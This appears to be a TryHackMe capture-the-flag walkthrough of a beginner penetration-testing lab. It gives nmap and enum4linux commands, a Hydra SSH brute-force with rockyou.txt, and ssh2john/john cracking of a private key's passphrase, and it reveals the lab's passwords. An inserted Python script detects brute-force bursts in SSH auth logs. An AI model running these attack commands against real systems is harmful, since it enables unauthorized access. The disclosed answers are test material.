[ Basics Penetration Testing ] - TRYHACKME

This article is a walkthrough of basic penetration testing steps.

1. Deploy the machine and connect to the tryhackme network.
2. Find the service exposed by the machine.

To find the exposed services we can use nmap:

nmap -sC -sV -oN initial <machine_ip>

# Nmap 7.80 scan initiated Sun Sep 27 11:26:39 2020 as: nmap -sC -sV -oN initial 10.10.38.194
Nmap scan report for 10.10.38.196
Host is up (0.077s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2020-03-22T06:26:54-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-22T10:26:54
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 22 11:26:58 2020 -- 1 IP address (1 host up) scanned in 19.80 seconds
We have 3 open ports:
22: SSH
139 and 445: smbd

If we open this IP in the browser, we see a server running.


3. What is the name of the hidden directory on the web server (enter name without /)?

We could use gobuster for directory brute-forcing. We have a hint here, so let's try it first. /development is the directory found by gobuster.


4. Use brute-force to find the username and password
5. What is the username?

We have smbd open, so we can use enum4linux for that.

enum4linux -a <machine_ip>

Two users pop up: jan (a.k.a. j) and kay (a.k.a. k).

6. What is the password? + 7. What service do you use to access the server (answer in abbreviation, all caps)?

The password is pretty simple; a brute-force approach should unlock it.

We have information about the open ports. SSH is a great candidate for Hydra. A common password dictionary named rockyou.txt is provided with Kali Linux; you will find it at /usr/share/wordlists/rockyou.txt. This dictionary contains 14,341,564 unique passwords, used in 32,603,388 accounts.

$ hydra -l jan -P rockyou.txt ssh://<ip>

login: jan   password: armando
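From the defender's side, a Hydra run like the one above leaves a very recognisable trace in sshd's auth log: many failed passwords from one source against one user within seconds, then an acceptance. The script below is an added example, not part of the original write-up; it parses constructed auth.log lines (the host name basic2, source IPs and timestamps are made up) and flags that pattern.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (not from the post): a burst against jan, one miss against kay.
SAMPLE_LOG = """\
Sep 27 11:30:01 basic2 sshd[2101]: Failed password for jan from 10.10.14.5 port 41022 ssh2
Sep 27 11:30:01 basic2 sshd[2102]: Failed password for jan from 10.10.14.5 port 41024 ssh2
Sep 27 11:30:02 basic2 sshd[2103]: Failed password for jan from 10.10.14.5 port 41026 ssh2
Sep 27 11:30:03 basic2 sshd[2105]: Failed password for jan from 10.10.14.5 port 41030 ssh2
Sep 27 11:30:04 basic2 sshd[2106]: Accepted password for jan from 10.10.14.5 port 41032 ssh2
Sep 27 11:31:10 basic2 sshd[2110]: Failed password for kay from 10.10.14.9 port 50010 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse(line):
    # Returns (timestamp, result, user, ip) for a password-auth line, else None.
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year-less syslog stamp
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(log_text, threshold=4, window_seconds=60):
    # Flag (ip, user) pairs with >= threshold failures inside any window_seconds span
    # and record whether a success followed the burst (a guessed password).
    by_source = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse(line)
        if ev:
            by_source[(ev[3], ev[2])].append(ev)
    alerts = {}
    for key, evs in by_source.items():
        evs.sort()
        fails = [ts for ts, result, _, _ in evs if result == "Failed"]
        # Two-pointer sliding window over the sorted failure timestamps.
        burst, j = 0, 0
        for i, start in enumerate(fails):
            while j < len(fails) and (fails[j] - start).total_seconds() <= window_seconds:
                j += 1
            burst = max(burst, j - i)
        if burst >= threshold:
            accepted_after = any(r == "Accepted" and ts >= fails[-1] for ts, r, _, _ in evs)
            alerts[key] = {"failures": len(fails), "accepted_after": accepted_after}
    return alerts
```

Run `detect_bruteforce(SAMPLE_LOG)` to see the jan burst reported with `accepted_after` set, while kay's single miss stays below the threshold.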

8. Enumerate the machine to find any vectors for privilege escalation

9. What is the name of the other user you found(all lower case)?

We already have this information from question 5.


10. If you have found another user, what can you do with this information? + 11. What is the final password you obtain?

Now we can log in with ssh as jan. Listing jan's directory doesn't give any information, but we have one more username, kay.
We find id_rsa and id_rsa.pub, and a backup file named pass.back.

$ ssh -i id_rsa kay@<IP>

Enter passphrase for key 'id_rsa':
A passphrase is required to use this key to access the machine.

We can use John the Ripper to crack the key's passphrase.

$ python /usr/share/john/ssh2john.py kay_id_rsa > id_rsa.txt

$ john id_rsa.txt --wordlist=/opt/rockyou.txt
...
beeswax   (thm/kay/id_rsa)
Now we can log in as kay with this key and its cracked passphrase, and read the pass.back file.

$ ssh -i id_rsa kay@<IP>

$ cat pass.back

heresareallystrongpasswordthatfollowsthepasswordpolicy$$
